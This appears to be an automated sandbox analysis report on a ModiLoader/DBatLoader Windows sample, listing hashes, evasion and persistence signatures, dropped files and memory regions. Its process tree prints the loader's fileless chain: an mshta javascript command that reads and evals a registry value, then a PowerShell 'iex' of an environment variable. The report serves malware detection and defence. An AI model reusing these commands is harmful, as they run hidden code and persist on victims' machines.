Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
29-04-2024 05:07
General
-
Target
06e2068e32c74cd4bea37f256e61f702_JaffaCakes118.exe
-
Size
363KB
-
MD5
06e2068e32c74cd4bea37f256e61f702
-
SHA1
039eefc9bed956e74038533982568e04da953f57
-
SHA256
3c8095e9b9a69d9408833cf198e2bf7c11d647581d5cb4216a82dd70f6c81093
-
SHA512
abbf542d044cc42c3a048cb12651da7c34f3cbf4cd10b9d76b34b1f64c00bb280d9ce9f5a5e64d044c7af9fb7acac1d08740baa1f7bd6dfcc15ef963b4683be0
-
SSDEEP
6144:0e2N0dOCGzogTKULqOxmdK4ylktToPHVuIQHQeq2zhF9vCzsXZokGJ:0e2N0drW3THLHmI4gkG9u5HTZZI
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 49 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\06e2068e32c74cd4bea37f256e61f702_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\06e2068e32c74cd4bea37f256e61f702_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\06e2068e32c74cd4bea37f256e61f702_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\06e2068e32c74cd4bea37f256e61f702_JaffaCakes118.exe"2⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:QLaS47="0Kc";N0j=new%20ActiveXObject("WScript.Shell");C8yKc="DK";R4E5NS=N0j.RegRead("HKCU\\software\\TUBtFm\\ybx1IuOWn1");ZmVOT3od="B862lp";eval(R4E5NS);S89VSZv="8SvgN4";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:izven2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\7976b13\0f76566.lnkFilesize
885B
MD5d4a93a11d80469f9580ef238b32d5d34
SHA13c90d9b0e963e68cddd934a726c2dddff200b426
SHA256340e472ddb27f186692fc334a000217962d66efab3e7fc57bab74b0cf7fc37df
SHA512d0c6395d8b3ed3a1c8fd83056354375c90ea21f976cae9ee1dbf2280ce33dd354d81496815c8258711fc8f0516debc1e563ce0003f793519b40ca1c03544384f
-
C:\Users\Admin\AppData\Local\7976b13\51dd6a1.batFilesize
64B
MD5e064db30ccd49e94f6b75dc5c34bddcb
SHA1994bdd191b4014fbe7ec96e183936530d8e9e522
SHA256a619a5d13af390a2ed3806d55f405bbcc93a8623dbf7be9963fca54dd0eca434
SHA512102de2b946a112fd8a387afdf0e00ed5a650e645c682c921e425c26abd26ecbf3165d0294a3256f2906294761ec85e9e0ee1a9016f864c079e6af9474d5f25a8
-
C:\Users\Admin\AppData\Local\7976b13\a6c8ed0.939cc270Filesize
41KB
MD591b28c0b759e4096fff3e63c370aba0d
SHA1b625f01ffbc5fb3f035050f067c8cbba7ae5c946
SHA256e9e44a4ec33da71b78655ef4b852a21856eaf97ae73d914cac85afa3386558d0
SHA51271b5d66a5502e4075aecab9f75a34503f6e72c210268952e368967283df27071585a794cabf7658e085e917320b7bda03dc88d7e8242063919fac723aa491c3c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98dc7c4.lnkFilesize
993B
MD543135ddee8414dddcffb3af57add4e41
SHA1177e0186124fcc2226c659f42465d1e931a037eb
SHA256942489989ef36106499359e666d70ea830908a2d9771a7f95a97889eb72f260c
SHA512f8e29bac3291fcaa218ca0fe59d75d03d8670f1a590293d1ed5d28eb82d77198e80ae27f52289a101c4ca10be79e3a5fee6cc824f11ba2a5bd0225cfec92775b
-
C:\Users\Admin\AppData\Roaming\c402751\453aea9.939cc270Filesize
31KB
MD5ed71c90275bb27c685fa12ae6d15fe0f
SHA1bf147e5f98c7fbaf87f71114f7f8c74754805648
SHA2565c87e206d9f2562f4580b040563b0cc107d68af90080c4dce5cd0f24d97b097e
SHA51242c61de9b26d5f142366de80bca6ee8707bc8fcbc8ef15933fe9f2130d598ddfbd3f00621021e37062e9e64d298ef22dad29b74311a958bc1d0e5b16a546d780
-
memory/2420-38-0x00000000061E0000-0x00000000062BA000-memory.dmpFilesize
872KB
-
memory/2420-40-0x0000000003020000-0x0000000005020000-memory.dmpFilesize
32.0MB
-
memory/2420-41-0x00000000061E0000-0x00000000062BA000-memory.dmpFilesize
872KB
-
memory/2456-62-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-72-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-49-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-56-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-57-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-59-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-60-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-61-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-71-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-73-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-74-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-65-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-63-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-80-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-42-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-39-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-46-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-45-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-44-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-48-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-43-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-52-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-51-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-54-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-53-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-55-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-50-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-64-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-47-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2456-58-0x0000000000150000-0x0000000000297000-memory.dmpFilesize
1.3MB
-
memory/2880-25-0x0000000006370000-0x0000000006527000-memory.dmpFilesize
1.7MB
-
memory/2880-3-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/2996-32-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-5-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-19-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2996-24-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-31-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-18-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-1-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-2-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-23-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-35-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-8-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-12-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-15-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/2996-90-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-27-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-26-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-28-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-29-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB
-
memory/2996-30-0x0000000001D50000-0x0000000001E2A000-memory.dmpFilesize
872KB